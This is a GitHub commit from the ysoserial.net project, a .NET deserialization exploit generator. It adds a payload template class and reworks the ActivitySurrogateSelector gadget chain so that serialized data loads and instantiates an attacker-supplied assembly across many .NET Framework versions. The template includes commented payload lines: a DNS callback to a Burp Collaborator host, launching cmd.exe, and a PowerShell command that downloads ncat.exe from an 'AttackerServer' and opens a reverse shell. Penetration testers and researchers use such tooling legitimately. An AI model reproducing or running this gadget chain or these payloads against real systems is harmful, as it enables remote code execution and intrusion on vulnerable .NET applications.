Skip to content
Permalink
Browse files

compitable ActivitySurrogateSelectorGenerator

  • Loading branch information
zcgonvh committed Mar 3, 2020
1 parent ee7c1ce commit 385ed1e886a00dba5c7ed57bd774f94ab706498b
@@ -0,0 +1,47 @@
// ExploitClass was renamed to E to reduce the size a little bit
class E
{
public E()
{
//try
//{
/* Payload code to be executed. Examples: */


/* Showing a message box: -c "ExploitClass.cs;./dlls/System.Windows.Forms.dll" */
System.Windows.Forms.MessageBox.Show("Pwned", "Pwned", System.Windows.Forms.MessageBoxButtons.OK, System.Windows.Forms.MessageBoxIcon.Error);


/* Creating a text file: -c "ExploitClass.cs;./dlls/System.dll" */
/*
using (System.IO.StreamWriter outputFile = new System.IO.StreamWriter(@"C:\windows\temp\test.txt"))
{
outputFile.WriteLine("testme");
}
//*/


/* Making a DNS request for PoC (System.dll needs to be in the dlls folder): -c "ExploitClass.cs;./dlls/System.dll" */
//System.Net.Dns.Resolve("8z89j28ubxz878iktsny9abwyn4ds2.burpcollaborator.net");


/* Running a command: -c "ExploitClass.cs;./dlls/System.dll" */
//System.Diagnostics.Process.Start("cmd.exe", "/c calc");
//System.Diagnostics.Process.Start("powershell.exe", "-Command \"(New-Object Net.WebClient).DownloadFile(\\\"http://AttackerServer/ncat.exe\\\", \\\"c:\\windows\\temp\\ncat.exe\\\")\"");// & c:\\windows\\temp\\ncat.exe -nv AttackerServerIP 4444 -e powershell.exe");


/* Causing a delay */
//System.Threading.Thread.Sleep(10000); // waits for 10 seconds

/*For web pentesting*/
/*
System.Web.HttpContext.Current.Response.AddHeader("X-YSOSERIAL-NET","HERE");
System.Web.HttpContext.Current.Response.Cookies.Add(new System.Web.HttpCookie("X-YSOSERIAL-NET", "HERE"));
System.Web.HttpContext.Current.Response.End();
*/
//}
//catch (Exception)
//{
//}
}
}
@@ -0,0 +1,44 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{0746F37A-9825-4E9D-A1EB-6DCC03B25C45}</ProjectGuid>
<OutputType>Library</OutputType>
<AppDesignerFolder>Properties</AppDesignerFolder>
<RootNamespace>E</RootNamespace>
<AssemblyName>E</AssemblyName>
<TargetFrameworkVersion>v2.0</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>..\ysoserial\bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>..\ysoserial\bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Web" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="ExploitClass.cs" />
</ItemGroup>
<ItemGroup>
<Folder Include="Properties\" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>
@@ -1,10 +1,12 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 14
VisualStudioVersion = 14.0.25420.1
# Visual Studio 15
VisualStudioVersion = 15.0.28010.2046
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ysoserial", "ysoserial\ysoserial.csproj", "{6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C}"
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ExploitClass", "ExploitClass\ExploitClass.csproj", "{0746F37A-9825-4E9D-A1EB-6DCC03B25C45}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
@@ -15,8 +17,15 @@ Global
{6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C}.Debug|Any CPU.Build.0 = Debug|Any CPU
{6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C}.Release|Any CPU.ActiveCfg = Release|Any CPU
{6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C}.Release|Any CPU.Build.0 = Release|Any CPU
{0746F37A-9825-4E9D-A1EB-6DCC03B25C45}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{0746F37A-9825-4E9D-A1EB-6DCC03B25C45}.Debug|Any CPU.Build.0 = Debug|Any CPU
{0746F37A-9825-4E9D-A1EB-6DCC03B25C45}.Release|Any CPU.ActiveCfg = Release|Any CPU
{0746F37A-9825-4E9D-A1EB-6DCC03B25C45}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {1B6D325D-180A-4B70-8A4E-BA521A8FCC4A}
EndGlobalSection
EndGlobal

This file was deleted.

@@ -35,17 +35,28 @@ public class PayloadClass : ISerializable
protected byte[] assemblyBytes;
public PayloadClass()
{
this.assemblyBytes = File.ReadAllBytes(typeof(E).Assembly.Location);
this.assemblyBytes = File.ReadAllBytes(Path.Combine(Path.GetDirectoryName(Assembly.GetExecutingAssembly().Location), "e.dll"));
}

protected PayloadClass(SerializationInfo info, StreamingContext context)
{
}

private IEnumerable<TResult> CreateWhereSelectEnumerableIterator<TSource, TResult>(IEnumerable<TSource> src, Func<TSource, bool> predicate, Func<TSource, TResult> selector)
{
Type t = Assembly.Load("System.Core, Version=3.5.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089")
.GetType("System.Linq.Enumerable+WhereSelectEnumerableIterator`2")
.MakeGenericType(typeof(TSource), typeof(TResult));
return t.GetConstructors()[0].Invoke(new object[] { src, predicate, selector }) as IEnumerable<TResult>;
}
public void GetObjectData(SerializationInfo info, StreamingContext context)
{
System.Diagnostics.Trace.WriteLine("In GetObjectData");

//Old technique contains a compiler-generated class [System.Core]System.Linq.Enumerable+<SelectManyIterator>d__[Compiler_Generated_Class_SEQ]`2,
//the Compiler_Generated_Class_SEQ may NOT same in different version of .net framework.
//For example, in .net framework 4.6 was 16,and 17 in .net framework 4.7.

/*
// Build a chain to map a byte array to creating an instance of a class.
// byte[] -> Assembly.Load -> Assembly -> Assembly.GetType -> Type[] -> Activator.CreateInstance -> Win!
List<byte[]> data = new List<byte[]>();
@@ -54,9 +65,50 @@ public void GetObjectData(SerializationInfo info, StreamingContext context)
Func<Assembly, IEnumerable<Type>> map_type = (Func<Assembly, IEnumerable<Type>>)Delegate.CreateDelegate(typeof(Func<Assembly, IEnumerable<Type>>), typeof(Assembly).GetMethod("GetTypes"));
var e2 = e1.SelectMany(map_type);
var e3 = e2.Select(Activator.CreateInstance);
*/

//New technique use [System.Core]System.Linq.Enumerable+WhereSelectEnumerableIterator`2 only to fix it.
//It make compatible from v3.5 to lastest(needs to using v3.5 compiler, and may also need to call disable type check first if target runtime was v4.8+).
//Execution chain: Assembly.Load(byte[]).GetTypes().GetEnumerator().{MoveNext(),get_Current()} -> Activator.CreateInstance() -> Win!
byte[][] e1 = new byte[][] { assemblyBytes };
IEnumerable<Assembly> e2 = CreateWhereSelectEnumerableIterator<byte[], Assembly>(e1, null, Assembly.Load);
IEnumerable<IEnumerable<Type>> e3 = CreateWhereSelectEnumerableIterator<Assembly, IEnumerable<Type>>(e2,
null,
(Func<Assembly, IEnumerable<Type>>)Delegate.CreateDelegate
(
typeof(Func<Assembly, IEnumerable<Type>>),
typeof(Assembly).GetMethod("GetTypes")
)
);
IEnumerable<IEnumerator<Type>> e4 = CreateWhereSelectEnumerableIterator<IEnumerable<Type>, IEnumerator<Type>>(e3,
null,
(Func<IEnumerable<Type>, IEnumerator<Type>>)Delegate.CreateDelegate
(
typeof(Func<IEnumerable<Type>, IEnumerator<Type>>),
typeof(IEnumerable<Type>).GetMethod("GetEnumerator")
)
);
//bool MoveNext(this) => Func<IEnumerator<Type>,bool> => predicate
//Type get_Current(this) => Func<IEnumerator<Type>,Type> => selector
//
//WhereSelectEnumerableIterator`2.MoveNext =>
// if(predicate(IEnumerator<Type>)) {selector(IEnumerator<Type>);} =>
// IEnumerator<Type>.MoveNext();return IEnumerator<Type>.Current;
IEnumerable<Type> e5 = CreateWhereSelectEnumerableIterator<IEnumerator<Type>, Type>(e4,
(Func<IEnumerator<Type>, bool>)Delegate.CreateDelegate
(
typeof(Func<IEnumerator<Type>, bool>),
typeof(IEnumerator).GetMethod("MoveNext")
),
(Func<IEnumerator<Type>, Type>)Delegate.CreateDelegate
(
typeof(Func<IEnumerator<Type>, Type>),
typeof(IEnumerator<Type>).GetProperty("Current").GetGetMethod()
)
);
IEnumerable<object> end = CreateWhereSelectEnumerableIterator<Type, object>(e5, null, Activator.CreateInstance);
// PagedDataSource maps an arbitrary IEnumerable to an ICollection
PagedDataSource pds = new PagedDataSource() { DataSource = e3 };
PagedDataSource pds = new PagedDataSource() { DataSource = end };
// AggregateDictionary maps an arbitrary ICollection to an IDictionary
// Class is internal so need to use reflection.
IDictionary dict = (IDictionary)Activator.CreateInstance(typeof(int).Assembly.GetType("System.Runtime.Remoting.Channels.AggregateDictionary"), pds);
@@ -71,6 +123,9 @@ public void GetObjectData(SerializationInfo info, StreamingContext context)
ls.Add(e1);
ls.Add(e2);
ls.Add(e3);
ls.Add(e4);
ls.Add(e5);
ls.Add(end);
ls.Add(pds);
ls.Add(verb);
ls.Add(dict);
@@ -144,7 +199,7 @@ public override string Name()

public override string Finders()
{
return "James Forshaw";
return "James Forshaw,fixed by zcgonvh";
}

public override List<string> Labels()
@@ -122,7 +122,6 @@
<Compile Include="Helpers\FormatterType.cs" />
<Compile Include="Helpers\InputArgs.cs" />
<Compile Include="Helpers\SerializersHelper.cs" />
<Compile Include="ExploitClass.cs" />
<Compile Include="Generators\ActivitySurrogateDisableTypeCheck.cs" />
<Compile Include="Generators\ActivitySurrogateSelectorFromFileGenerator.cs" />
<Compile Include="Generators\ActivitySurrogateSelectorGenerator.cs" />

0 comments on commit 385ed1e

Please sign in to comment.
You can’t perform that action at this time.